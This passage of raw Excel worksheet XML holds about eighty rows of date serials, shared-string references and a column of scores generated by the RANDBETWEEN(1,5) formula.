      </c>
      <c r="E13624" t="s">
        <v>12211</v>
      </c>
      <c r="F13624">
        <f t="shared" ca="1" si="212"/>
        <v>1</v>
      </c>
    </row>
    <row r="13625" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13625" s="1">
        <v>43265.075243055559</v>
      </c>
      <c r="C13625" t="s">
        <v>319</v>
      </c>
      <c r="D13625" t="s">
        <v>320</v>
      </c>
      <c r="E13625" t="s">
        <v>12212</v>
      </c>
      <c r="F13625">
        <f t="shared" ca="1" si="212"/>
        <v>4</v>
      </c>
    </row>
    <row r="13626" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13626" s="1">
        <v>43265.054259259261</v>
      </c>
      <c r="C13626" t="s">
        <v>41</v>
      </c>
      <c r="E13626" t="s">
        <v>12213</v>
      </c>
      <c r="F13626">
        <f t="shared" ca="1" si="212"/>
        <v>5</v>
      </c>
    </row>
    <row r="13627" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13627" s="1">
        <v>43264.962071759262</v>
      </c>
      <c r="C13627" t="s">
        <v>118</v>
      </c>
      <c r="E13627" t="s">
        <v>12214</v>
      </c>
      <c r="F13627">
        <f t="shared" ca="1" si="212"/>
        <v>4</v>
      </c>
    </row>
    <row r="13628" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13628" s="1">
        <v>43264.947418981479</v>
      </c>
      <c r="C13628" t="s">
        <v>10</v>
      </c>
      <c r="D13628" t="s">
        <v>80</v>
      </c>
      <c r="E13628" t="s">
        <v>32</v>
      </c>
      <c r="F13628">
        <f t="shared" ca="1" si="212"/>
        <v>4</v>
      </c>
    </row>
    <row r="13629" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A13629" s="1">
        <v>43264.890844907408</v>
      </c>
      <c r="C13629" t="s">
        <v>41</v>
      </c>
      <c r="E13629" s="2" t="s">
        <v>12215</v>
      </c>
      <c r="F13629">
        <f t="shared" ca="1" si="212"/>
        <v>4</v>
      </c>
    </row>
    <row r="13630" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A13630" s="1">
        <v>43264.849687499998</v>
      </c>
      <c r="C13630" t="s">
        <v>107</v>
      </c>
      <c r="D13630" t="s">
        <v>14</v>
      </c>
      <c r="E13630" s="2" t="s">
        <v>12216</v>
      </c>
      <c r="F13630">
        <f t="shared" ca="1" si="212"/>
        <v>5</v>
      </c>
    </row>
    <row r="13631" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13631" s="1">
        <v>43264.784432870372</v>
      </c>
      <c r="C13631" t="s">
        <v>10</v>
      </c>
      <c r="D13631" t="s">
        <v>112</v>
      </c>
      <c r="E13631" t="s">
        <v>12217</v>
      </c>
      <c r="F13631">
        <f t="shared" ca="1" si="212"/>
        <v>4</v>
      </c>
    </row>
    <row r="13632" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13632" s="1">
        <v>43264.782534722224</v>
      </c>
      <c r="C13632" t="s">
        <v>6</v>
      </c>
      <c r="D13632" t="s">
        <v>821</v>
      </c>
      <c r="E13632" t="s">
        <v>12218</v>
      </c>
      <c r="F13632">
        <f t="shared" ca="1" si="212"/>
        <v>4</v>
      </c>
    </row>
    <row r="13633" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13633" s="1">
        <v>43264.760682870372</v>
      </c>
      <c r="C13633" t="s">
        <v>140</v>
      </c>
      <c r="D13633" t="s">
        <v>234</v>
      </c>
      <c r="E13633" t="s">
        <v>12219</v>
      </c>
      <c r="F13633">
        <f t="shared" ca="1" si="212"/>
        <v>4</v>
      </c>
    </row>
    <row r="13634" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13634" s="1">
        <v>43264.738240740742</v>
      </c>
      <c r="C13634" t="s">
        <v>41</v>
      </c>
      <c r="E13634" t="s">
        <v>12220</v>
      </c>
      <c r="F13634">
        <f t="shared" ref="F13634:F13697" ca="1" si="213">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="13635" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13635" s="1">
        <v>43264.72084490741</v>
      </c>
      <c r="C13635" t="s">
        <v>10</v>
      </c>
      <c r="D13635" t="s">
        <v>1036</v>
      </c>
      <c r="E13635" s="2" t="s">
        <v>12221</v>
      </c>
      <c r="F13635">
        <f t="shared" ca="1" si="213"/>
        <v>5</v>
      </c>
    </row>
    <row r="13636" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13636" s="1">
        <v>43264.690520833334</v>
      </c>
      <c r="C13636" t="s">
        <v>73</v>
      </c>
      <c r="E13636" t="s">
        <v>12222</v>
      </c>
      <c r="F13636">
        <f t="shared" ca="1" si="213"/>
        <v>3</v>
      </c>
    </row>
    <row r="13637" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13637" s="1">
        <v>43264.689872685187</v>
      </c>
      <c r="C13637" t="s">
        <v>73</v>
      </c>
      <c r="E13637" t="s">
        <v>12222</v>
      </c>
      <c r="F13637">
        <f t="shared" ca="1" si="213"/>
        <v>2</v>
      </c>
    </row>
    <row r="13638" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13638" s="1">
        <v>43264.646666666667</v>
      </c>
      <c r="C13638" t="s">
        <v>10</v>
      </c>
      <c r="D13638" t="s">
        <v>192</v>
      </c>
      <c r="E13638" t="s">
        <v>12223</v>
      </c>
      <c r="F13638">
        <f t="shared" ca="1" si="213"/>
        <v>1</v>
      </c>
    </row>
    <row r="13639" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13639" s="1">
        <v>43264.624918981484</v>
      </c>
      <c r="C13639" t="s">
        <v>107</v>
      </c>
      <c r="D13639" t="s">
        <v>271</v>
      </c>
      <c r="E13639" s="2" t="s">
        <v>12224</v>
      </c>
      <c r="F13639">
        <f t="shared" ca="1" si="213"/>
        <v>3</v>
      </c>
    </row>
    <row r="13640" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13640" s="1">
        <v>43264.553055555552</v>
      </c>
      <c r="C13640" t="s">
        <v>10</v>
      </c>
      <c r="D13640" t="s">
        <v>1036</v>
      </c>
      <c r="E13640" t="s">
        <v>12225</v>
      </c>
      <c r="F13640">
        <f t="shared" ca="1" si="213"/>
        <v>4</v>
      </c>
    </row>
    <row r="13641" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13641" s="1">
        <v>43264.532106481478</v>
      </c>
      <c r="C13641" t="s">
        <v>10</v>
      </c>
      <c r="D13641" t="s">
        <v>89</v>
      </c>
      <c r="E13641" t="s">
        <v>12226</v>
      </c>
      <c r="F13641">
        <f t="shared" ca="1" si="213"/>
        <v>5</v>
      </c>
    </row>
    <row r="13642" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13642" s="1">
        <v>43264.512037037035</v>
      </c>
      <c r="C13642" t="s">
        <v>6</v>
      </c>
      <c r="D13642" t="s">
        <v>25</v>
      </c>
      <c r="E13642" t="s">
        <v>12227</v>
      </c>
      <c r="F13642">
        <f t="shared" ca="1" si="213"/>
        <v>3</v>
      </c>
    </row>
    <row r="13643" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13643" s="1">
        <v>43264.499166666668</v>
      </c>
      <c r="C13643" t="s">
        <v>10</v>
      </c>
      <c r="D13643" t="s">
        <v>494</v>
      </c>
      <c r="E13643" s="2" t="s">
        <v>12228</v>
      </c>
      <c r="F13643">
        <f t="shared" ca="1" si="213"/>
        <v>3</v>
      </c>
    </row>
    <row r="13644" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13644" s="1">
        <v>43264.490312499998</v>
      </c>
      <c r="C13644" t="s">
        <v>10</v>
      </c>
      <c r="D13644" t="s">
        <v>993</v>
      </c>
      <c r="E13644" s="2" t="s">
        <v>12229</v>
      </c>
      <c r="F13644">
        <f t="shared" ca="1" si="213"/>
        <v>5</v>
      </c>
    </row>
    <row r="13645" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A13645" s="1">
        <v>43264.469780092593</v>
      </c>
      <c r="C13645" t="s">
        <v>10</v>
      </c>
      <c r="D13645" t="s">
        <v>52</v>
      </c>
      <c r="E13645" s="2" t="s">
        <v>12230</v>
      </c>
      <c r="F13645">
        <f t="shared" ca="1" si="213"/>
        <v>4</v>
      </c>
    </row>
    <row r="13646" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13646" s="1">
        <v>43264.460648148146</v>
      </c>
      <c r="C13646" t="s">
        <v>10</v>
      </c>
      <c r="D13646" t="s">
        <v>17</v>
      </c>
      <c r="E13646" t="s">
        <v>12231</v>
      </c>
      <c r="F13646">
        <f t="shared" ca="1" si="213"/>
        <v>4</v>
      </c>
    </row>
    <row r="13647" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A13647" s="1">
        <v>43264.460231481484</v>
      </c>
      <c r="C13647" t="s">
        <v>10</v>
      </c>
      <c r="D13647" t="s">
        <v>39</v>
      </c>
      <c r="E13647" s="2" t="s">
        <v>12232</v>
      </c>
      <c r="F13647">
        <f t="shared" ca="1" si="213"/>
        <v>3</v>
      </c>
    </row>
    <row r="13648" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13648" s="1">
        <v>43264.458425925928</v>
      </c>
      <c r="C13648" t="s">
        <v>10</v>
      </c>
      <c r="D13648" t="s">
        <v>89</v>
      </c>
      <c r="E13648" t="s">
        <v>12233</v>
      </c>
      <c r="F13648">
        <f t="shared" ca="1" si="213"/>
        <v>5</v>
      </c>
    </row>
    <row r="13649" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13649" s="1">
        <v>43264.454479166663</v>
      </c>
      <c r="C13649" t="s">
        <v>6</v>
      </c>
      <c r="D13649" t="s">
        <v>25</v>
      </c>
      <c r="E13649" t="s">
        <v>12234</v>
      </c>
      <c r="F13649">
        <f t="shared" ca="1" si="213"/>
        <v>5</v>
      </c>
    </row>
    <row r="13650" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13650" s="1">
        <v>43264.448854166665</v>
      </c>
      <c r="C13650" t="s">
        <v>10375</v>
      </c>
      <c r="D13650" t="s">
        <v>7</v>
      </c>
      <c r="E13650" t="s">
        <v>8504</v>
      </c>
      <c r="F13650">
        <f t="shared" ca="1" si="213"/>
        <v>5</v>
      </c>
    </row>
    <row r="13651" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13651" s="1">
        <v>43264.447962962964</v>
      </c>
      <c r="C13651" t="s">
        <v>107</v>
      </c>
      <c r="E13651" s="2" t="s">
        <v>12235</v>
      </c>
      <c r="F13651">
        <f t="shared" ca="1" si="213"/>
        <v>2</v>
      </c>
    </row>
    <row r="13652" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13652" s="1">
        <v>43264.442453703705</v>
      </c>
      <c r="C13652" t="s">
        <v>10</v>
      </c>
      <c r="D13652" t="s">
        <v>271</v>
      </c>
      <c r="E13652" s="2" t="s">
        <v>12236</v>
      </c>
      <c r="F13652">
        <f t="shared" ca="1" si="213"/>
        <v>2</v>
      </c>
    </row>
    <row r="13653" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13653" s="1">
        <v>43264.414502314816</v>
      </c>
      <c r="C13653" t="s">
        <v>10</v>
      </c>
      <c r="D13653" t="s">
        <v>251</v>
      </c>
      <c r="E13653" t="s">
        <v>12237</v>
      </c>
      <c r="F13653">
        <f t="shared" ca="1" si="213"/>
        <v>4</v>
      </c>
    </row>
    <row r="13654" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13654" s="1">
        <v>43264.41138888889</v>
      </c>
      <c r="C13654" t="s">
        <v>10</v>
      </c>
      <c r="D13654" t="s">
        <v>251</v>
      </c>
      <c r="E13654" t="s">
        <v>12238</v>
      </c>
      <c r="F13654">
        <f t="shared" ca="1" si="213"/>
        <v>2</v>
      </c>
    </row>
    <row r="13655" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13655" s="1">
        <v>43264.398333333331</v>
      </c>
      <c r="C13655" t="s">
        <v>41</v>
      </c>
      <c r="E13655" t="s">
        <v>5754</v>
      </c>
      <c r="F13655">
        <f t="shared" ca="1" si="213"/>
        <v>4</v>
      </c>
    </row>
    <row r="13656" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13656" s="1">
        <v>43264.382951388892</v>
      </c>
      <c r="C13656" t="s">
        <v>10</v>
      </c>
      <c r="D13656" t="s">
        <v>151</v>
      </c>
      <c r="E13656" s="2" t="s">
        <v>12239</v>
      </c>
      <c r="F13656">
        <f t="shared" ca="1" si="213"/>
        <v>2</v>
      </c>
    </row>
    <row r="13657" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13657" s="1">
        <v>43264.369004629632</v>
      </c>
      <c r="C13657" t="s">
        <v>10</v>
      </c>
      <c r="D13657" t="s">
        <v>14</v>
      </c>
      <c r="E13657" t="s">
        <v>12240</v>
      </c>
      <c r="F13657">
        <f t="shared" ca="1" si="213"/>
        <v>4</v>
      </c>
    </row>
    <row r="13658" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13658" s="1">
        <v>43264.363530092596</v>
      </c>
      <c r="C13658" t="s">
        <v>48</v>
      </c>
      <c r="E13658" t="s">
        <v>12241</v>
      </c>
      <c r="F13658">
        <f t="shared" ca="1" si="213"/>
        <v>1</v>
      </c>
    </row>
    <row r="13659" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A13659" s="1">
        <v>43264.35596064815</v>
      </c>
      <c r="C13659" t="s">
        <v>10</v>
      </c>
      <c r="D13659" t="s">
        <v>192</v>
      </c>
      <c r="E13659" s="2" t="s">
        <v>12242</v>
      </c>
      <c r="F13659">
        <f t="shared" ca="1" si="213"/>
        <v>1</v>
      </c>
    </row>
    <row r="13660" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13660" s="1">
        <v>43264.33253472222</v>
      </c>
      <c r="C13660" t="s">
        <v>71</v>
      </c>
      <c r="E13660" t="s">
        <v>12243</v>
      </c>
      <c r="F13660">
        <f t="shared" ca="1" si="213"/>
        <v>2</v>
      </c>
    </row>
    <row r="13661" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13661" s="1">
        <v>43264.330682870372</v>
      </c>
      <c r="C13661" t="s">
        <v>41</v>
      </c>
      <c r="E13661" s="2" t="s">
        <v>12244</v>
      </c>
      <c r="F13661">
        <f t="shared" ca="1" si="213"/>
        <v>3</v>
      </c>
    </row>
    <row r="13662" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A13662" s="1">
        <v>43264.329560185186</v>
      </c>
      <c r="C13662" t="s">
        <v>2210</v>
      </c>
      <c r="D13662" t="s">
        <v>993</v>
      </c>
      <c r="E13662" s="2" t="s">
        <v>12245</v>
      </c>
      <c r="F13662">
        <f t="shared" ca="1" si="213"/>
        <v>3</v>
      </c>
    </row>
    <row r="13663" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A13663" s="1">
        <v>43264.276817129627</v>
      </c>
      <c r="C13663" t="s">
        <v>48</v>
      </c>
      <c r="E13663" s="2" t="s">
        <v>12246</v>
      </c>
      <c r="F13663">
        <f t="shared" ca="1" si="213"/>
        <v>2</v>
      </c>
    </row>
    <row r="13664" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A13664" s="1">
        <v>43264.243402777778</v>
      </c>
      <c r="C13664" t="s">
        <v>107</v>
      </c>
      <c r="D13664" t="s">
        <v>222</v>
      </c>
      <c r="E13664" s="2" t="s">
        <v>12247</v>
      </c>
      <c r="F13664">
        <f t="shared" ca="1" si="213"/>
        <v>1</v>
      </c>
    </row>
    <row r="13665" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13665" s="1">
        <v>43264.239652777775</v>
      </c>
      <c r="C13665" t="s">
        <v>410</v>
      </c>
      <c r="E13665" s="2" t="s">
        <v>12248</v>
      </c>
      <c r="F13665">
        <f t="shared" ca="1" si="213"/>
        <v>1</v>
      </c>
    </row>
    <row r="13666" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13666" s="1">
        <v>43264.220324074071</v>
      </c>
      <c r="C13666" t="s">
        <v>2210</v>
      </c>
      <c r="D13666" t="s">
        <v>632</v>
      </c>
      <c r="E13666" s="2" t="s">
        <v>12249</v>
      </c>
      <c r="F13666">
        <f t="shared" ca="1" si="213"/>
        <v>5</v>
      </c>
    </row>
    <row r="13667" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13667" s="1">
        <v>43264.198946759258</v>
      </c>
      <c r="C13667" t="s">
        <v>48</v>
      </c>
      <c r="E13667" s="2" t="s">
        <v>12250</v>
      </c>
      <c r="F13667">
        <f t="shared" ca="1" si="213"/>
        <v>4</v>
      </c>
    </row>
    <row r="13668" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13668" s="1">
        <v>43264.164351851854</v>
      </c>
      <c r="C13668" t="s">
        <v>140</v>
      </c>
      <c r="D13668" t="s">
        <v>234</v>
      </c>
      <c r="E13668" s="2" t="s">
        <v>12251</v>
      </c>
      <c r="F13668">
        <f t="shared" ca="1" si="213"/>
        <v>4</v>
      </c>
    </row>
    <row r="13669" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13669" s="1">
        <v>43264.121446759258</v>
      </c>
      <c r="C13669" t="s">
        <v>139</v>
      </c>
      <c r="E13669" t="s">
        <v>12252</v>
      </c>
      <c r="F13669">
        <f t="shared" ca="1" si="213"/>
        <v>2</v>
      </c>
    </row>
    <row r="13670" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A13670" s="1">
        <v>43264.043449074074</v>
      </c>
      <c r="C13670" t="s">
        <v>10</v>
      </c>
      <c r="D13670" t="s">
        <v>46</v>
      </c>
      <c r="E13670" s="2" t="s">
        <v>12253</v>
      </c>
      <c r="F13670">
        <f t="shared" ca="1" si="213"/>
        <v>5</v>
      </c>
    </row>
    <row r="13671" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13671" s="1">
        <v>43264.003252314818</v>
      </c>
      <c r="C13671" t="s">
        <v>140</v>
      </c>
      <c r="D13671" t="s">
        <v>141</v>
      </c>
      <c r="E13671" t="s">
        <v>12254</v>
      </c>
      <c r="F13671">
        <f t="shared" ca="1" si="213"/>
        <v>2</v>
      </c>
    </row>
    <row r="13672" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13672" s="1">
        <v>43263.997175925928</v>
      </c>
      <c r="C13672" t="s">
        <v>73</v>
      </c>
      <c r="E13672" t="s">
        <v>12255</v>
      </c>
      <c r="F13672">
        <f t="shared" ca="1" si="213"/>
        <v>5</v>
      </c>
    </row>
    <row r="13673" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13673" s="1">
        <v>43263.990046296298</v>
      </c>
      <c r="C13673" t="s">
        <v>10</v>
      </c>
      <c r="D13673" t="s">
        <v>112</v>
      </c>
      <c r="E13673" s="2" t="s">
        <v>12256</v>
      </c>
      <c r="F13673">
        <f t="shared" ca="1" si="213"/>
        <v>1</v>
      </c>
    </row>
    <row r="13674" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13674" s="1">
        <v>43263.978750000002</v>
      </c>
      <c r="C13674" t="s">
        <v>73</v>
      </c>
      <c r="E13674" s="2" t="s">
        <v>12257</v>
      </c>
      <c r="F13674">
        <f t="shared" ca="1" si="213"/>
        <v>1</v>
      </c>
    </row>
    <row r="13675" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13675" s="1">
        <v>43263.975428240738</v>
      </c>
      <c r="C13675" t="s">
        <v>2172</v>
      </c>
      <c r="D13675" t="s">
        <v>89</v>
      </c>
      <c r="E13675" s="2" t="s">
        <v>12258</v>
      </c>
      <c r="F13675">
        <f t="shared" ca="1" si="213"/>
        <v>3</v>
      </c>
    </row>
    <row r="13676" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13676" s="1">
        <v>43263.968275462961</v>
      </c>
      <c r="C13676" t="s">
        <v>10</v>
      </c>
      <c r="D13676" t="s">
        <v>80</v>
      </c>
      <c r="E13676" t="s">
        <v>12259</v>
      </c>
      <c r="F13676">
        <f t="shared" ca="1" si="213"/>
        <v>4</v>
      </c>
    </row>
    <row r="13677" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13677" s="1">
        <v>43263.960856481484</v>
      </c>
      <c r="C13677" t="s">
        <v>410</v>
      </c>
      <c r="E13677" s="2" t="s">
        <v>12260</v>
      </c>
      <c r="F13677">
        <f t="shared" ca="1" si="213"/>
        <v>4</v>
      </c>
    </row>
    <row r="13678" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13678" s="1">
        <v>43263.949490740742</v>
      </c>
      <c r="C13678" t="s">
        <v>10</v>
      </c>
      <c r="D13678" t="s">
        <v>36</v>
      </c>
      <c r="E13678" t="s">
        <v>12261</v>
      </c>
      <c r="F13678">
        <f t="shared" ca="1" si="213"/>
        <v>1</v>
      </c>
    </row>
    <row r="13679" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A13679" s="1">
        <v>43263.900868055556</v>
      </c>
      <c r="C13679" t="s">
        <v>107</v>
      </c>
      <c r="D13679" t="s">
        <v>86</v>
      </c>
      <c r="E13679" s="2" t="s">
        <v>12262</v>
      </c>
      <c r="F13679">
        <f t="shared" ca="1" si="213"/>
        <v>4</v>
      </c>
    </row>
    <row r="13680" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13680" s="1">
        <v>43263.889525462961</v>
      </c>
      <c r="C13680" t="s">
        <v>314</v>
      </c>
      <c r="E13680" t="s">
        <v>12263</v>
      </c>
      <c r="F13680">
        <f t="shared" ca="1" si="213"/>
        <v>5</v>
      </c>
    </row>
    <row r="13681" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13681" s="1">
        <v>43263.83662037037</v>
      </c>
      <c r="C13681" t="s">
        <v>41</v>
      </c>
      <c r="E13681" t="s">
        <v>12264</v>
      </c>
      <c r="F13681">
        <f t="shared" ca="1" si="213"/>
        <v>3</v>
      </c>
    </row>
    <row r="13682" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13682" s="1">
        <v>43263.796168981484</v>
      </c>
      <c r="C13682" t="s">
        <v>454</v>
      </c>
      <c r="D13682" t="s">
        <v>86</v>
      </c>
      <c r="E13682" s="2" t="s">
        <v>12265</v>
      </c>
      <c r="F13682">
        <f t="shared" ca="1" si="213"/>
        <v>4</v>
      </c>
    </row>
    <row r="13683" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13683" s="1">
        <v>43263.785555555558</v>
      </c>
      <c r="C13683" t="s">
        <v>140</v>
      </c>
      <c r="D13683" t="s">
        <v>234</v>
      </c>
      <c r="E13683" s="2" t="s">
        <v>12266</v>
      </c>
      <c r="F13683">
        <f t="shared" ca="1" si="213"/>
        <v>5</v>
      </c>
    </row>
    <row r="13684" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A13684" s="1">
        <v>43263.738877314812</v>
      </c>
      <c r="C13684" t="s">
        <v>107</v>
      </c>
      <c r="D13684" t="s">
        <v>885</v>
      </c>
      <c r="E13684" s="2" t="s">
        <v>12267</v>
      </c>
      <c r="F13684">
        <f t="shared" ca="1" si="213"/>
        <v>4</v>
      </c>
    </row>
    <row r="13685" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13685" s="1">
        <v>43263.684803240743</v>
      </c>
      <c r="C13685" t="s">
        <v>41</v>
      </c>
      <c r="E13685" t="s">
        <v>12268</v>
      </c>
      <c r="F13685">
        <f t="shared" ca="1" si="213"/>
        <v>4</v>
      </c>
    </row>
    <row r="13686" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13686" s="1">
        <v>43263.677407407406</v>
      </c>
      <c r="C13686" t="s">
        <v>10</v>
      </c>
      <c r="D13686" t="s">
        <v>151</v>
      </c>
      <c r="E13686" t="s">
        <v>12269</v>
      </c>
      <c r="F13686">
        <f t="shared" ca="1" si="213"/>
        <v>5</v>
      </c>
    </row>
    <row r="13687" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13687" s="1">
        <v>43263.624039351853</v>
      </c>
      <c r="C13687" t="s">
        <v>10</v>
      </c>
      <c r="D13687" t="s">
        <v>112</v>
      </c>
      <c r="E13687" t="s">
        <v>12270</v>
      </c>
      <c r="F13687">
        <f t="shared" ca="1" si="213"/>
        <v>5</v>
      </c>
    </row>
    <row r="13688" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13688" s="1">
        <v>43263.587083333332</v>
      </c>
      <c r="C13688" t="s">
        <v>10</v>
      </c>
      <c r="D13688" t="s">
        <v>336</v>
      </c>
      <c r="E13688" t="s">
        <v>12271</v>
      </c>
      <c r="F13688">
        <f t="shared" ca="1" si="213"/>
        <v>4</v>
      </c>
    </row>
    <row r="13689" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13689" s="1">
        <v>43263.573194444441</v>
      </c>
      <c r="C13689" t="s">
        <v>97</v>
      </c>
      <c r="E13689" t="s">
        <v>12272</v>
      </c>
      <c r="F13689">
        <f t="shared" ca="1" si="213"/>
        <v>2</v>
      </c>
    </row>
    <row r="13690" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13690" s="1">
        <v>43263.53638888889</v>
      </c>
      <c r="C13690" t="s">
        <v>10</v>
      </c>
      <c r="D13690" t="s">
        <v>46</v>
      </c>
      <c r="E13690" t="s">
        <v>12273</v>
      </c>
      <c r="F13690">
        <f t="shared" ca="1" si="213"/>
        <v>1</v>
      </c>
    </row>
    <row r="13691" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13691" s="1">
        <v>43263.531712962962</v>
      </c>
      <c r="C13691" t="s">
        <v>10</v>
      </c>
      <c r="D13691" t="s">
        <v>46</v>
      </c>
      <c r="E13691" t="s">
        <v>12274</v>
      </c>
      <c r="F13691">
        <f t="shared" ca="1" si="213"/>
        <v>3</v>
      </c>
    </row>
    <row r="13692" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A13692" s="1">
        <v>43263.518460648149</v>
      </c>
      <c r="C13692" t="s">
        <v>6</v>
      </c>
      <c r="D13692" t="s">
        <v>25</v>
      </c>
      <c r="E13692" s="2" t="s">
        <v>12275</v>
      </c>
      <c r="F13692">
        <f t="shared" ca="1" si="213"/>
        <v>2</v>
      </c>
    </row>
    <row r="13693" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13693" s="1">
        <v>43263.498981481483</v>
      </c>
      <c r="C13693" t="s">
        <v>10</v>
      </c>
      <c r="D13693" t="s">
        <v>89</v>
      </c>
      <c r="E13693" s="2" t="s">
        <v>12276</v>
      </c>
      <c r="F13693">
        <f t="shared" ca="1" si="213"/>
        <v>2</v>
      </c>
    </row>
    <row r="13694" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A13694" s="1">
        <v>43263.477187500001</v>
      </c>
      <c r="C13694" t="s">
        <v>41</v>
      </c>
      <c r="E13694" s="2" t="s">
        <v>12277</v>
      </c>
      <c r="F13694">
        <f t="shared" ca="1" si="213"/>
        <v>1</v>
      </c>
    </row>
    <row r="13695" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13695" s="1">
        <v>43263.453831018516</v>
      </c>
      <c r="C13695" t="s">
        <v>6</v>
      </c>
      <c r="D13695" t="s">
        <v>25</v>
      </c>
      <c r="E13695" s="2" t="s">
        <v>12278</v>
      </c>
      <c r="F13695">
        <f t="shared" ca="1" si="213"/>
        <v>1</v>
      </c>
    </row>
    <row r="13696" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13696" s="1">
        <v>43263.446064814816</v>
      </c>
      <c r="C13696" t="s">
        <v>71</v>
      </c>
      <c r="E13696" s="2" t="s">
        <v>12279</v>
      </c>
      <c r="F13696">
        <f t="shared" ca="1" si="213"/>
        <v>2</v>
      </c>
    </row>
    <row r="13697" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13697" s="1">
        <v>43263.43478009259</v>
      </c>
      <c r="C13697" t="s">
        <v>6</v>
      </c>
      <c r="D13697" t="s">
        <v>194</v>
      </c>
      <c r="E13697" s="2" t="s">
        <v>12280</v>
      </c>
      <c r="F13697">
        <f t="shared" ca="1" si="213"/>
        <v>3</v>
      </c>
    </row>
    <row r="13698" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A13698" s="1">
        <v>43263.430393518516</v>
      </c>
      <c r="C13698" t="s">
        <v>2210</v>
      </c>
      <c r="D13698" t="s">
        <v>821</v>
      </c>
      <c r="E13698" s="2" t="s">
        <v>12281</v>
      </c>
      <c r="F13698">
        <f t="shared" ref="F13698:F13761" ca="1" si="214">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="13699" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A13699" s="1">
        <v>43263.418194444443</v>
      </c>
      <c r="C13699" t="s">
        <v>260</v>
      </c>
      <c r="E13699" s="2" t="s">
        <v>12282</v>
      </c>
      <c r="F13699">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13700" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13700" s="1">
        <v>43263.413321759261</v>
      </c>
      <c r="C13700" t="s">
        <v>10</v>
      </c>
      <c r="D13700" t="s">
        <v>17</v>
      </c>
      <c r="E13700" t="s">
        <v>12283</v>
      </c>
      <c r="F13700">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13701" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13701" s="1">
        <v>43263.413032407407</v>
      </c>
      <c r="C13701" t="s">
        <v>71</v>
      </c>
